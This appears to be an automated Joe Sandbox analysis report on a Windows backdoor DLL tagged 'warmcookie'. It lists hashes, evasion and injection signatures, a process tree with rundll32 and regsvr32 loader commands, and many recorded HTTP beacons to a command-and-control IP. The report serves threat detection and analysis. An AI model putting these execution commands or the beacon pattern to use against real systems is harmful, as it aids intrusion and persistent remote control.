Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
akdn2nefd.bin.dll

Overview

General Information

Sample name:akdn2nefd.bin.dll
renamed because original name is a hash value
Original sample name:akdn2nefd.bin.exe
Analysis ID:1493196
MD5:59b7b8d29252a9128536fbd08d24375f
SHA1:7221b9125608a54f9dd706166f936c16ee23164a
SHA256:b7aec5f73d2a6bbd8cd920edb4760e2edadc98c3a45bf4fa994d47ca9cbd02f6
Tags:backdoorexewarmcookie
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates files in the system32 config directory
Drops HTML or HTM files to system directories
Found evasive API chain (may stop execution after checking mutex)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 7316 cmdline: loaddll64.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7368 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 7392 cmdline: rundll32.exe "C:\Users\user\Desktop\akdn2nefd.bin.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
    • regsvr32.exe (PID: 7376 cmdline: regsvr32.exe /s C:\Users\user\Desktop\akdn2nefd.bin.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • rundll32.exe (PID: 7400 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllGetClassObject MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7456 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 7504 cmdline: rundll32.exe C:\Users\user\Desktop\akdn2nefd.bin.dll,DllRegisterServerEx MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 7568 cmdline: C:\Windows\system32\rundll32.exe "C:\ProgramData\Ventuso LLC\Updater.dll",Start /u MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Ventuso LLC\Updater.dllReversingLabs: Detection: 13%
Source: C:\ProgramData\Ventuso LLC\Updater.dllVirustotal: Detection: 12%Perma Link
Multi AV Scanner detection for submitted file
Source: akdn2nefd.bin.dllReversingLabs: Detection: 13%
Source: akdn2nefd.bin.dllVirustotal: Detection: 12%Perma Link
Source: akdn2nefd.bin.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: E:\work\ooooooops\181\knock_v1.1.8\knock\bin64\knock.pdb source: rundll32.exe, 00000004.00000003.1777532301.0000016C8D400000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1778367651.0000016C8D405000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmp, akdn2nefd.bin.dll, Updater.dll.4.dr
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE115015B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,swprintf,FindFirstFileW,FindNextFileW,FindClose,8_2_00007FFE115015B0
Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFE11511610 FindFirstFileExA,8_2_00007FFE11511610

Networking

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exeNetwork Connect: 72.5.43.29 80Jump to behavior
Source: Joe Sandbox ViewASN Name: UNASSIGNED UNASSIGNED
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Content-Length: 120Connection: Keep-AliveCache-Control: no-cacheData Raw: e4 31 93 8b 9c d0 f6 03 3e bb ef 52 64 c1 a6 e0 7b 26 73 32 9b 6e b3 1b ca a1 a7 e7 8f f5 36 22 5c fb 00 56 f2 3e 8d e0 c3 17 d9 5f dd d0 cb b4 1d a7 cc 3f b9 11 97 de 94 d1 ff 36 27 f0 9c 8f 9c 10 ec 74 6a a4 13 e9 c8 ec c6 61 56 e6 b7 2d b2 fe f8 7b 4b cc 17 0e bf 72 29 50 98 a5 bd 77 17 f3 25 e2 91 1f a5 c7 67 c5 ed fe 1f f0 bb 15 eb 2a be 50 73 b1 6c 66 Data Ascii: 1>Rd{&s2n6"\V>_?6'tjaV-{Kr)Pw%g*Pslf
Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Content-Length: 776Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: Ud8jaJzQ9gM+u+9SZ8Gm4HAmczKbbrMbg+un54X1NiJU+wBWxj6N4HAI2V+ZhKDNCc2JDf9So6e8u64LJvCcj6dH2UQB82SGnYWtBkmQy2Sm6dEaH598d6MGC1WYs6oLWZlkldha5KBknoi5C4GvN/UYlBkqyyIPE5cIIVGSjTh+a97te0g+7+ffZ2vYJaHsmaHBdXII1wIiXAFKUser-Agent: Mozilla / 5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)Host: 72.5.43.29Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.29
